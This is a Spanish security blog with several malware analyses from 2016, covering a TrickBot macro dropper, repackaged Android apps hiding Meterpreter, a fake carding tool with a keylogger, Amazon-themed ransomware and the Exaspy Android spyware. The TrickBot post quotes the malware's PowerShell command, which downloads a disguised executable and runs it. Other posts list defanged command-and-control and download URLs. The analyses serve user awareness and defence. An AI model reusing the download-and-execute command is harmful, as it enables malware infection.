martes, 29 de noviembre de 2016

Continúan las andanzas de Trickbot

Hasta ahora encontrábamos el troyano bancario TrickBot como un binario aislado, pero abandona su comportamiento para seguir un modus operandi más habitual de éste tipo de amenazas. Además, cabe destacar que a pesar de comenzar en Australia y avanzar cruzar el charco hasta Europa, esta vez ha llegado a Canadá.

Captura del documento de Word que solicita habilitar el contenido


Esta vez, encontramos un documento de Word el cual nos pide que habilitemos la edición y el contenido, de esta manera permitiendo que se ejecuten las macros incluidas dentro del documento de Word.

Esta macro, lanza a través de Powershell la descarga de un archivo remoto .png, que a pesar de su extensión no es una imagen...

PowerShell (New-Object System.Net.WebClient).DownloadFile('hxxp://wingsbiotech.com/kufma/sdogsodngsdlk.png','C:\Users\xxxxx\AppData\Local\Temp\scpsis.exe');Start-process 'C:\Users\xxxxx\AppData\Local\Temp\scpsis.exe';

Tras la descarga de la falsa iagen ".png", se almacena en %temp% para posteriormente ser ejecutado con una llamada a start-process


Una vez lograda la infección, comienza a conectarse a servidores remotos para descargar la configuración necesaria para su funcionamiento (tal y como vimos en la anterior una-al-día).

Esta vez, además de a los clientes de las entidades ya mencionadas se suman a la lista de afectados Santander UK y a BMO, conocido como "Bank of Montreal" (Canadá).

Recuerda que si recibes un documento por parte de un desconocido no debes abrirlo. A esto debemos añadir, que no se deben habilitar posibles ejecuciones de contenido en documentos de Office cuando el destinatario de este es desconocido, para evitar este tipo de amenazas.

Más información:

una-al-dia (07/11/2016) El troyano bancario TrickBot azota a Europa
  


Fernando Díaz

miércoles, 23 de noviembre de 2016

Las apariencias engañan

Una de las técnicas más habituales del malware para lograr la infección es hacerse pasar por aplicaciones normales y de utilidad para el usuario. Vamos a analizar dos aplicaciones que en principio pueden parecer inofensivas, pero que después incluyen un elemento bastante peligroso que veremos a continuación.

Las dos aplicaciones que nos ocupan en esta ocasión son las siguientes:


A primera vista, parecen una aplicación de aprendizaje de C++ y otra para trámites bancarios respectivamente. Y en efecto, lo son:




¿Qué elemento peligroso nos encontramos? Las aplicaciones al pasar por los escáneres antivirus parecen limpias, sin ningún signo de peligro:



Pero encontramos lo siguiente: ambas aplicaciones contienen una payload de Meterpreter. 

Para los que lo desconozcan: 

"Meterpreter es un Payload que se ejecuta después del proceso de explotación o abuso de una vulnerabilidad en un sistema operativo, meterpreter es el diminutivo para meta-interprete y se ejecuta completamente en memoria; evitando así tener problemas con los Antivirus."

Lo que ha ocurrido en esta situación es que se ha utilizado una herramienta para infectar aplicaciones de Android utilizando los propios permisos de la aplicación y de esta manera evitar la detección de los antivirus, incluso se pueden añadir permisos nuevos. Concretamente, hacen uso de esta inyección de código; https://github.com/sensepost/kwetza

Listado de posibles permisos añadidos...

Si miramos mas a fondo la aplicación, encontramos que algo no cuadra...


Miramos por encima el smali de la activity... 


Y efectivamente, verificamos que incluye dicho payload. Mucho más sorprendente si recordamos que habían pasado como inofensivas ante los escáneres antivirus. Esto ocurre en ambas aplicaciones, que a pesar de ser oficiales re-empaquetadas, cuentan con código modificado y no se distribuyen por markets oficiales como Google Play

Una vez más, recordamos la necesidad de evitar la descarga desde markets no oficiales o de webs de dudosa fiabilidad, para evitar este tipo de infecciones. 




Fernando Díaz


lunes, 14 de noviembre de 2016

El carding puede infectarte

¿Eres de los que cree que robar tarjetas es algo de pulsar una tecla? Si es así, es posible que el malware que veremos a continuación acabe afectándote.

Se trata de un programa que supuestamente nos permitirá obtener tarjetas de crédito válidas para realizar compras on-line. Lo que englobaríamos dentro del "Carding", es decir, el uso ilegitimo de tarjetas de crédito, o sus números, pertenecientes a otras personas.

Captura del Malware tras pulsar el botón "Connect"

Como siempre nada es lo que parece. El programa en cuestión se nos presenta de la siguiente manera, junto con un botón que nos "da acceso" a la base de datos, y otro que supuestamente comprueba que las tarjetas extraidas de la "base de datos" funcionen. Como podéis imaginar, ninguno de estos dos botones cumple de lejos alguna de estas funciones. 

Una vez pulsado el botón, hará durante un tiempo determinado un falso proceso de conexi, hasta decir que ha fallado:

Falso proceso de conexión remota

Mientras tanto, aprovechará para volcar sin que te des cuenta los archivos maliciosos en tu disco. Claro esta, también añade el ejecutable malicioso al arranque de Windows. 

Volcado de uno de los 3 ejecutables maliciosos

Se comunica con "hxxp://l75qjosx54mue7lv.onion.rip/neutron". Además cuenta con un cliente de SMTP utilizado para el envío de información. 

Información enviada inicialmente al servidor remoto

Entre otras cosas, para hacer pruebas, crea los ficheros necesarios para el envío de correos por SMTP.


Y llegamos a la parte clave... Una de las "features" de este malware es la de keylogger, pero éste solo actúa en determinadas situaciones. Por ejemplo, cuando detecte que se está visitando la página de las siguientes:
  • Amazon
  • Apple
  • Blockchain o Blockchain wallet
  • Coinbase
  • eBay
  • Gamil
  • Localbitcoins
  • OnlineBanking
  • NETELLER
  • PayPal
  • Perfect Money
  • Facebook
  • Yahoo
  • Microsoft / Outlook 

No obstante, el portapapeles si que será copiado en cualquier situación a un archivo instantáneamente.. El objetivo de este malware en concreto, parece ser su propia distribución por e-mail aprovechando la librería que incorpora y al usuario en si, y además el robo de datos de determinados sitios específicos.



En un principio, contaríamos finalmente con los siguientes archivos:
  • %appdata%/Microsoft/Windows/: winhost.exe, taskengine.exe, sys32.exe, EASendMail40.dll, _logWindows, _mailConfig.txt, _mailLetter.txt, _mailList.txt
Así que ya sabes... Ten cuidado con este tipo de herramientas, un solo click puede salir muy caro...  




Fernando Díaz

viernes, 11 de noviembre de 2016

Ransomware aprovecha la imagen de Amazon para infectar

Todos conocemos Amazon, la gran tienda online donde podemos comprar todo tipo de cosas: Desde lo último en electrónica hasta incluso la comida de la semana. Por ello, los creadores de ransomware hacen uso de cualquier método para lograr infectar a usuarios y así obtener mayores ingresos. Ésta vez, se hacen pasar por un falso correo de una factura de Amazon.


El susodicho correo, incluye datos falsos de un supuesto pedido así como un archivo comprimido (.zip) adjunto. Este zip incluye un fichero en javascript (extensión .js) que será el encargado de descargar el malware.

Falso mensaje recibido

Archivo adjunto con el dropper.

Una vez infectado, los archivos con las extensiones elegidas por los atacantes serán cifrados y pedirán un rescate para recuperar dichos archivos.

Este tipo de correos se ha visto con anterioridad, sin embargo esta vez el contenido acaba resultando muy peligroso para el usuario.

Como dato anecdótico, este Ransomware se lanza con "nipple".


Para evitar este tipo de amenazas si recibes un correo que piensas que no deberías haber recibido: evita abrir este tipo de adjuntos. ¿No has hecho una compra en Amazon y has recibido este correo? Entonces posiblemente el objetivo de dicho correo, es aprovecharse de tu curiosidad para infectarte.





Fernando Díaz

jueves, 3 de noviembre de 2016

Exaspy, un nuevo malware espía para Android

El malware no para, y nuestro Laboratorio tampoco. En esta ocasión tenemos en nuestro repositorio de malware una nueva muestra un troyano para dispositivos Android. Conocido como Exaspy pretende espiar múltiples aplicaciones. Como es habitual su análisis resulta muy interesante.



En esta ocasión, la aplicación se hace pasar por Google Play Services, aunque podemos observar rápidamente que ni el autor ni el nombre del paquete coinciden con el original. No conforme con eso, la lista de permisos iniciales que solicita la aplicación es un tanto sospechosa:


Entre las posibilidades de este malware, se incluye la posibilidad de grabar audio, dentro y fuera de las llamadas, recolección de mensajes SMS/MMS y de aplicaciones como WhatsApp.

Modulos con los que cuenta este RAT

A la hora de instalarse, solicita permisos de administrador del dispositivo, de igual forma intenta solicitar root para poder ejecutarse completamente. Dentro de las posibilidades de root, cuenta con la recolección de SMS, MMS, y además de parsers de las bases de datos de mensajes de aplicaciones conocidas. 

Módulo de recolección de mensajes (WhatsApp)


Son muchas las aplicaciones afectadas. La lista completa incluye: email, Facebook Messenger, Gmail, Hangouts, Keep, PayBox, Skype, Viber y WhatsApp. 

Cuenta además, con todo tipo de funcionalidades:
  • Recolección de mensajes, acceso al historial del navegador
  • Obtención de fotos de la galería del dispositivo
  • Control de la cámara, y micrófono del dispositivo
  • Capturas de pantalla del dispositivo
  • Acceso a la localización del dispositivo
  • Recolección de contraseñas almacenadas en el dispositivo (WiFi)
  • Acceso a la shell del sistema afectado
Contamos además, con la URL de descarga del APK malicioso, así como de la URL de comunicación con la API del RAT.

hxxp://exaspy(.)com/a.apk (Futuras actualizaciones)
api(.).andr0idservices(.).com (API)
Es interesante, que dicha comunicación con el C&C permite (a parte de la tranmisión de archivos locales) la ejecución de comandos de shell. Además de permitir el uso de futuros posibles exploits no incluidos en el malware inicial, lo que le puede permitir elevar privilegios en el dispositivo. 

Además, esta aplicación no cuenta con una MainActivity, lo que provoca que no se muestre en la lista de aplicaciones instaladas del Launcher. Una forma más de evitar su detección por el usuario. Dentro de la funcionalidad de root, cuenta con la posibilidad de matar el zygote de Android, provocando un soft-reset (killProcess("zygote");). Aunque resulta más interesante como el malware intenta quitarse de encima al servicio de Samsung, para que éste último no le mate. Finalmente, para evitar ser eliminado se instala como servicio del sistema.


Ante este tipo de malware, una vez más las recomendaciones habituales. Que pasan por no visitar enlaces desconocidos, evitar la instalación de aplicaciones fuera del Market oficial y la instalación de Koodous desde Google Play:



Fernando Díaz